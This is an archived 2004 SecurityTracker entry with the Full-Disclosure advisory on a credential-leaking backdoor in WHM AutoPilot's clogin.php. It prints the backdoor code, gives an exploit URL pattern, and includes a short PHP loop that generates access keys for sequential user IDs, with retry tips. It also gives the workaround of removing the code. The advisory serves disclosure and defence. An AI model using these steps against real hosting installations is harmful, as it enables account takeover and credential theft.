SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Generic)  >   WHM AutoPilot Vendors:   Benchmark Designs
WHM AutoPilot Backdoor Discloses Authentication Credentials to Remote Users
SecurityTracker Alert ID:  1010833
SecurityTracker URL:  http://securitytracker.com/id/1010833
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 2 2004
Impact:   Disclosure of authentication information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.4.5
Description:   A vulnerability was reported in WHM AutoPilot. A remote user can exploit a backdoor function to obtain a target user's authentication credentials.

An anonymous user reported that the 'clogin.php' login page contains a backdoor. A remote user can supply an HTTP GET request with a specially crafted 'c' parameter value to gain access to a target user's account. The parameter value is based on the target user's User ID field, encrypted by the clogin_e() function and then Base64 encoded. The User ID fields are incrementally generated and can readily be guessed, the report indicated.

A demonstration exploit URL is provided:

http://[target domain]/accounts/clogin.php?c=[KEY]

A remote user can supply this type of URL to obtain a target user's username and password.

The vendor was reportedly notified on August 1, 2004.

Impact:   A remote user can obtain a target user's username and password and then gain access to the system with the target user's credentials.
Solution:   No vendor solution was available at the time of this entry.

According to the report, the following backdoor code can be removed from 'clogin.php':

if (isset($c))
{
$c=clogin_d(base64_decode($c));

$query="select ";
$query.="username, ";
$query.="password ";
$query.="from ";
$query.="user ";
$query.="where ";
$query.="uid='".addslashes(trim($c))."' ";
$query.="limit 0, 1";

$rs=mysql_fetch_row(mysql_query($query));

$username=$rs[0];
$password=clogin_d(base64_decode($rs[1]));
}

This will disable Administrative logins for standard users.

Vendor URL:  www.whmautopilot.com/index.php (Links to External Site)
Cause:   Access control error, Authentication error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Benchmark Designs' WHM Autopilot backdoor vulnerability to plain-text password.


Subject:
Benchmark Designs' WHM Autopilot (Probably all versions up to 2.4.5) vulerable to plain-text 
credential leakage via backdoor.


Preamble:
Benchmark Designs' WHM Autopilot is a client management system made for webhosts, in order to 
simplify webhosting business management. It manages CPanel (http://www.cpanel.net/) and WHM 
(http://www.cpanel.net/) accounts, including account creation, maintenance, and removal. It is 
meant to be a solution to automate account billing and account creation.

(Taken from http://www.whmautopilot.com/index.php)
Started by a webhost looking for more out of a simple managment script, Brandee Diggs (Owner of 
Spinn A Web Cafe, Founder of Benchmark Designs) setout to build an internal management system 
that 
could handle the day to day operations of a normal hosting company. The key was to remove the 
need 
to constantly watch your orders and mange the installs. Alas, WHM AutoPilot was born.

Knowing that the industry is constantly changing and the demands and needs of every webhost is 
different, the developers decided to pull in most of the suggestions from the licensee webhosts 
and 
add those requests as features into the script. Essential making the WHM AutoPilot the script 
built 
for webhosts, by webhosts - and it is still built that way today.


Problem:
Benchmark Designs' WHM Autopilot is vulnerable to plain-text credential leakage due to a bug in 
client logins. In the client login page (/clogin.php) there is a built in backdoor for 
administrators to login as standard user accounts. This backdoor is accessed using the GET var 
'c'. This variable is nothing more than an encrypted user ID, which is an automatically 
incremented field in the database. Using WHM Autopilot's encryption functions clogin_e(), and the 
PHP method base64_encode(), one can generate the hash required to get a user's username and 
plain-text password. The required WHM Autopilot functions are found in /inc/client_functions.php.
Since the user ID field is automatically incremented, one can generate keys for as many accounts 
as desired. The code to generate these keys would be:

<?php
$numAccounts = 5; // Set to any #
for($i=1; $i <= $numAccounts; $i++) {
        echo base64_encode(clogin_e($i))."<br />";
}
?>

This code creates a list of values to feed to clogin.php as the GET variable 'c'. Once the 
complete 
URI is requested, including the GET var (e.g. http://somedomain/accounts/clogin.php?c=KEY), the 
login form will automatically take on the plain-text values of the account's username and 
password. 
Note that the passwords are stored using the same encryption methods as we find for the user ID 
here. I have found that you do not always get a fully working key on the first try. Sometimes the 
key you generate is only good enough to get you a plaintext username, but an encrypted password. 
If 
this is the case, continue generating the keys until you get one that gives you the plain-text 
password. Once the username and password are achieved, a simple click of the login button 
accesses an entire user account, including CPanel access, account cancellation access, and 
payment 
functions access.


Workaround:
This bug can be fixed by removing the backdoor. Since clogin.php is thankfully not encoded with 
the 
Zend Optimizer, the backdoor code can be removed. The backdoor code needing to be removed is the 
following:

if (isset($c))
        {
        $c=clogin_d(base64_decode($c));

        $query="select ";
        $query.="username, ";
        $query.="password ";
        $query.="from ";
        $query.="user ";
        $query.="where ";
        $query.="uid='".addslashes(trim($c))."' ";
        $query.="limit 0, 1";

        $rs=mysql_fetch_row(mysql_query($query));

        $username=$rs[0];
        $password=clogin_d(base64_decode($rs[1]));
        }

On version 2.4.5, this code is from line 77 to line 94. Simply removing this code, and saving the 
file, will remove this vulnerability. Removing this code will disable Administrative logins for 
standard users, but the vendor could easily conjure a workaround for that. Ultimately however, 
user 
credentials should not be stored in a form that can be resolved to plain-text, one way hashes 
should be used for added security, and no backdoors should exist.

An alternative workaround would be to use another vendor, that doesn't put backdoors in their 
code.
Perhaps an open-source solution should be saught.


Vendor Contact:
Benchmark Designs' WHM Autopilot
URL: http://www.whmautopilot.com/
E-Mail: info@whmautopilot.com
Mailing Address:
  WHM AutoPilot HCMS
  P.O. Box 401
  Secretary, Maryland 21664


Disclosure Timeline:
Problem Discovered: July 30, 2004
Vendor Notified: August 1, 2004
Public Release: August 1, 2004


About the Author:
The author is a student at the Rochester Institute of Technology, majoring in Software 
Engineering.
When he's not contracting programming projects, he enjoys fishing, soccer, basketball, and 
computer gaming. The author has a passion for anything UNIX, and has grown to detest Microsoft 
beyond his ability to represent that detest in text.

The author is posting this message anonymously due to the draconian license of the product. Being 
wary of legal consequences, the author decided it was best to release this message 
anonymously and forfeit credit for the find. Perhaps the vendor should persue one of two paths; 
The 
vendor should either release their product under a more open license, or charge less money for a 
product that can so easily jeopardize the stability of a business.


Greets:
I'd like to say hi to George, swoolley, and tautology, and to thank swoolley and tautology for 
helping to make this post possible.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC